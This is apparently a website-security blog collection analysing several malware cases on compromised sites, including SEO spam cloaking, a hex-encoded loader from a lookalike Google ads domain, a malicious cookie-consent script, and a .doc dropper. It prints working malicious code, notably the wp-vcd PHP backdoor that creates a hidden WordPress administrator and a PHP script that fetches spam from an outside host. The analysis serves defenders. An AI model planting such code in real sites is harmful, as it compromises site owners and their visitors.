Malware-Serving Spam to Search Engine Bots

We recently discovered this malware with a list of IP ranges belonging to search engines that are serving them SEO spam. It even takes a snapshot of the website it’s on and uses that as a template so the pages look like they are a part of the website.

You can see some of the IP addresses the malware is looking for:

Here are some of the types of content being injected into the template page:

The left-side.php file contains the template taken from the main site where the malware is on:

As you can see, the malware uses special strings found in the template to know which parts to insert the spam into. The last part is a base64 encoded URL that leads to this spam(Viagra) website: hxxp://getbrowserssl[dot]xyz/tds/index.php?pl=aldactone

hxxp://thewebsite[dot]com/right-side.php?qid=2395&qcall=aldactone+mtf

This type of malware has the potential to do some lasting damage to any website, as spam pages are indexed by search engines, which can take weeks or months to drop. Page ranking and keywords might take even longer to fix, if at all.

Fake relatable domain used to distribute ads

Malicious users try to hide their malicious scripts in many ways these days, some more clever then others, in this case we look at a domain which looks like GoogleADS[.]com but it's actually GoogleADSL[.]com, this was done to make the domain look more legitimate and fool users into thinking the website is just loading Google ads. We found the domain to be used to redirect redirect users via fake jquery.js request.

The domain googleadsl.com appears to be registered by somebody in China and is being used to distribute the malicious ads.

Domain Name:googleadsl.com
Registry Domain ID:1650621483_domain_com-vrsn
Registrar WHOIS Server:whois.paycenter.com.cn
Registrar URL:hxxp://www.xinnet.com
Creation Date:2011-04-13T04:43:52.00Z

Here is the malicious code we found, you can see that it was hex encoded so that its hard to detect and analyze:

< Script language="javascript">
<!--
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"] ('\x3c\x53\x43\x52\x49\x50\x54 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x67\x6f\x6f\x67\x6c\x65\x61\x64\x73\x6c\x2e\x63\x6f\x6d\x2f\x73\x70\x63\x6f\x64\x65\x2f\x6a\x71\x75\x65\x72\x79\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e');
-->
</Script>

Decoded:

window["document"]["write"] ('<SCRIPT src="hxxp://www.googleadsl.com/spcode/jquery.js"></script>');

The above code redirects to 106hk.com:

curl --compressed -sD - -L -e "hxxp://randomsite.com" -A "Chrome 56" "hxxp://www.googleadsl.com/spcode/jquery.js"
HTTP/1.1 302 Redirect
Content-Length: 176
Content-Type: text/html
Location: hxxp://www.106hk.com/huodong/application/core/ajax.js

Here is the code returned after the redirect here:

hxxp://www.106hk.com/huodong/application/core/ajax.js

Content:

var cookieString = document.cookie;
var start = cookieString.indexOf("cookiesleep");
if(start!=-1){}else{
    var expires=new Date();
    expires.setTime(expires.getTime()+6*60*60*1000);
    document.cookie="cookiesleep=test;expires="+expires.toGMTString();
    var u = navigator.userAgent;
    if(u.indexOf('Android') > -1 || u.indexOf('Adr') > -1 ){
     window.location.href="hxxp://www.ncjkedu.com/3G/ads.html";
    }else{
     document.write('<script src="hxxp://libs.baidu.com/jquery/1.8.3/jquery.min.js"></script>');
     document.write('<script src="hxxp://www.106hk.com/huodong/application/core/layer/layer.js"></script>');
     document.write('<script src="hxxp://www.106hk.com/huodong/application/core/ad.js"></script>');
    }
}

We found both of these to be porn ads:

hxxp://www.106hk.com/huodong/application/core/ad.js
hxxp://www.ncjkedu.com/3G/ads.html

Users should be vigilant and look for any content trying to load from suspicious domains, in this case almost all files were infected with the malicious code and we found the website making requests for googleadsl.com but this domain can change.

Super Amazon Banners plugin gone rogue

During a recent investigation we found the plugin Super Amazon Banners to be serving malware/spam via the domain seoranker[.]info. We suspect that the domain expired and was registered by somebody else who is using it to serve the malware now.

The plugin causes this javascript to try and load a popup (popupHtml) with many spam links to external sites. Also appears to be causing loading issues and some pages refuse to load at all:

(function() {'use strict'; if (window['shbNetLoaded']) return;window['shbNetLoaded'] = true;var popupHtml =

Here is a screenshot of the code the plugin is trying to load:

The issue was reported to WordPress and the plugin can no longer be downloaded, it was closed. We recommend removing the plugin from your WordPress site if you are using it.

Cookie consent script used to distribute malware

Since the new website cookie usage regulations in the EU have come into place, many websites have added a warning on their website about how they use cookies on it and as well, ask for your consent.


This has caused many website owners to look for an easy way to implement this and we recently found one website which was using JavaScript from cookiescript[.]info to display this cookie consent request on their website. When visiting the website for the first time via Chrome, you would get a JavaScript alert saying: “Your computer is infected. You have to check it with antivirus.”

You can try to click Cancel or OK but in both cases you are going to get redirected to a website trying to convince you to buy antivirus software which could be malware. It looks like the website cookiescript.info is the one distributing this malware to unsuspecting users.

The malware we caught, attempted to load JavaScript from here:
cdn.front.to/libs/cookieconsent.min.4.js

That link just redirects to this URL:
hxxp://cdn[.]cookiescript[.]info/libs/cookiescript.min.js

Here is some of the code inside this JavaScript:

As you can see, it’s loading some additional JavaScript; this time it's “hxxp://cdn[.]cookiescript[.]info/libs/detect_ga.js”, and is the one responsible for detecting the user agent, attaching the cookie to your browser. Here is some of the code:

Finally, this code gets loaded. It has the alert message, along with the code responsible for the redirect to the malicious website selling you the antivirus software:

hxxp://jsserver[.]info/alert.php

You can see the code here:

The website cookiescript.info appears to be using Cloudflare to hide its IP addresses, and the domain is protected by WhoisGuard, so there is no easy way to say who owns this website. However, after some more digging, I was able to find some more details.

cookiescript[.]info. 86399 IN NS fred.ns.cloudflare.com.
cookiescript[.]info. 86399 IN NS mia.ns.cloudflare.com.

It appears that cookie-consent.org and front.to are also part of the same network. We also found some evidence which suggests that the malware has been operating for a few months already.

We highly recommend inspecting code before adding it to your website. It's always best for you to host the entire code on your own server instead of an external website which can be compromised or simply be owned by malicious users.

New wave of wp-vcd Malware

Recently we saw a new wave of a known malware that injects malicious WordPress admin users to vulnerable or compromised sites.


The malware, well analysed by Manuel D'Orso (here), was being injected on default WordPress themes that are not used by the infected site (twentyfifteen and twentysixteen mostly).

Back when we first detected this wp-vcd variant, it was injecting its code on "wp-includes/class.wp.php", this is an outdated strategy to avoid being detected by the unaware user; since nobody wants to delete WordPress core files and risk the site integrity. However, as security tools become more and more popular, this strategy fails. It's now pretty easy for any tool to detect modifications on core files. And, since theme files are changed constantly, they found a better place to hide it.

The injection, on most of the cases we found, was related to outdated software (plugins or themes). Which a simple update or using a WAF would prevent. Update: This malware is also pre-installed in "nulled" premium themes on certain download sites.

Code is pretty straightforward and doesn't hide its malicious intentions by encoding or obfuscation of functions...

<?phperror_reporting(0);if( !isset($_GET['go']) ){require $_SERVER['DOCUMENT_ROOT'].'/wp-load.php';$table_name = $wpdb->get_blog_prefix();$sample = 'a:1:{s:13:"administrator";b:1;}';if( isset($_GET['ok']) ) { echo '<!-- Silence is golden. -->';}if( isset($_GET['awu']) ) {$wpdb->query("INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`,  `user_status`, `display_name`) VALUES ('100010010', '100010010', '$P$BaRp7gFRTND5AwwJwpQY8EyN3otDiL.',   '100010010', 'te@ea.st', '', '2011/06/07 0:00 00:00:00', '', '0', '100010010');");$wpdb->query("INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (100010010, '100010010', '{$table_name}capabilities', '{$sample}');");$wpdb->query("INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '100010010', '{$table_name}user_level', '10');"); }if( isset($_GET['dwu']) ) { $wpdb->query("DELETE FROM $wpdb->users WHERE `ID` = 100010010");$wpdb->query("DELETE FROM $wpdb->usermeta WHERE $wpdb->usermeta.`umeta_id` = 100010010");}if( isset($_GET['key']) ) { $options = get_option( EWPT_PLUGIN_SLUG ); cho '<center><h2>' . esc_attr( $options['user_name'] . ':' .  esc_attr( $options['api_key'])) . '<br>';  echo esc_html( envato_market()->get_option( 'token' ) ); echo '</center></h2>'; }  } 

It is creating a new admin user named 100010010 which, as admin, can perform several malicious activities on the infected site.

If you found this code on your site and need help checking for any other possible malware, please contact us we'll be glad to help.

SEO spam loading from external site

Many websites get compromised and used for SEO in order to drive traffic to other websites that would usually be ranked very low or completely removed by Google due to their content. Recently I found some malware pulling spam content from chinajianzhan[.]cn.


The script attackers injected is very simple, they just use the file_get_contents() function to access the crafted URL using a specific user-agent which then returns the spam content, this helps them hide the spam content from search engines.

Here is the snippet:

<?php set_time_limit(0);header("Content-Type: text/html;charset=gb2312");$Remote_server = "hxxp://www[.]chinajianzhan[.]cn/bc/";$host_name = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['PHP_SELF'];$userAgent = $_SERVER['HTTP_USER_AGENT'];$Content_mb = getHTTPPage($Remote_server . "/index.html?host=" . $host_name);echo $Content_mb;exit();function getHTTPPage($url) { $opts = array('http' => array('method' => "GET", 'header' => "User-Agent: aQ0O010O")); $context = stream_context_create($opts); $html = @file_get_contents($url, false, $context); if (empty($html)) { exit("<p align='center'><font color='red'><b>Connection Error!</b></font></p>"); } return $html;}

The original version of the code was encoded using vidun[.]com and the code was added to randomly named files like can.php and michao.php

Here is an excerpt of the original code:

<?php // This file is protected by copyright law & provided under license. Copyright(C) 2005-2009 www.vidun.com, All rights reserved. $OOO0O0O00=__FILE__;$OOO000000=urldecode('%74%68%36%7 (Trimmed) Vfe48R3E+wJL7eWp9eWpZcbO1FM4Ikoi0dBX7eWp9eWP=

We highly recommend keeping your WordPress up to date and making sure that all of your passwords are unique and secure, the impacts of SEO spam on your website can be very large, your website could rank lower in search results along with being blacklisted which can take many weeks to resolve.

JavaScript Used to Generate Malicious Documents

When talking about compromised environments, we often think that the website itself is the end goal but that’s not always true. In some cases, attackers shift their focus to the user instead, especially when the website has lots of traffic.

Attackers may use different techniques and one we see often is called malware dropper. A dropper is not necessarily the malware that will cause the damage itself but its main objective is to simply download another piece of malicious code (the real malware) that will then, execute the tasks attackers wanted to achieve.

During a website investigation, we detected a few JavaScript files being executed as PHP to generate other malicious files (extension: .doc - malware dropper). You can see some of the code below. It shows the name of the file being assigned, then offered to the user for download:

lt;?php
private $contentName_ = 'EHU-96470130.dokument.doc';
private $contentType_ = 'application/msword';
public

function execute()
{
 $sp363bd2 = '.' . md5(md5(basename(dirname(__FILE__))));
 touch($sp363bd2);
 $spa7a53d = fopen($sp363bd2, 'r+');

 // content clipped, too long.

 header('Cache-Control: no-cache, no-store, max-age=0, must-revalidate');
 header('Pragma: no-cache');
 header('Content-Type: ' . $this->contentType_);
 header('Content-Disposition: attachment; filename="' . $this->contentName_ . '"');
 header('Content-Transfer-Encoding: binary');
 die(base64_decode($this->content_));
}

Additional file info:

$ file EHU-96470130.dokument.doc
EHU-96470130.dokument.doc: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: admin, Template: Normal.dotm, Last Saved By: admin, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed May  3 14:19:00 2017, Last Saved Time/Date: Wed May  3 14:19:00 2017, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0

When running that file against virustotal, 35 out of 57 engines detected the code, (mostly as W97M.Downloader, a well-known Word Macro Trojan).

Whenever the user visited a specific page from the compromised website, the .doc file had been triggered for a download. If executed on the user’s machine, that would download another trojan giving the attacker control to the user’s OS.

It’s very important to be proactive on the security of your website because as you can see, the issues may affect much more than just ranking, SEO and online presence, but also your audience.